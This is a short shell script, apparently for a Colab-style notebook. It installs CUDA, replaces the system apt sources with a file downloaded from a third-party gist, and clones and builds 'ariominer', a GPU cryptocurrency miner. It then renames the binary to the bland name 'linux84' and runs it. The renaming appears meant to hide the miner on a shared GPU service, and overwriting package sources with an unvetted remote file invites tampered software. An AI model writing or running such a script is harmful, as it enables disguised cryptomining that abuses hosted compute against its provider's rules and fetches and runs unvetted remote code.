apt-get update

apt-get install cmake -y

apt-get install git -y

apt-get install gcc-6 -y

apt-get install g++-6 -y

wget https://gist.githubusercontent.com/ishad0w/788555191c7037e249a439542c53e170/raw/3822ba49241e6fd851ca1c1cbcc4d7e87382f484/sources.list -O /etc/apt/sources.list

apt-get update

update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-6 10

update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-6 10

apt-get install --no-install-recommends -y nvidia-cuda-toolkit

git clone https://github.com/mobileapps84741274/linuxweb84741274
cd linuxweb84741274
mkdir build
cd build
cmake .. -DCUDA_TOOLKIT_ROOT_DIR=/usr/local/cuda
make

cd /content/linuxweb84741274/build/

mv ./ariominer ./linux84

./linux84 g
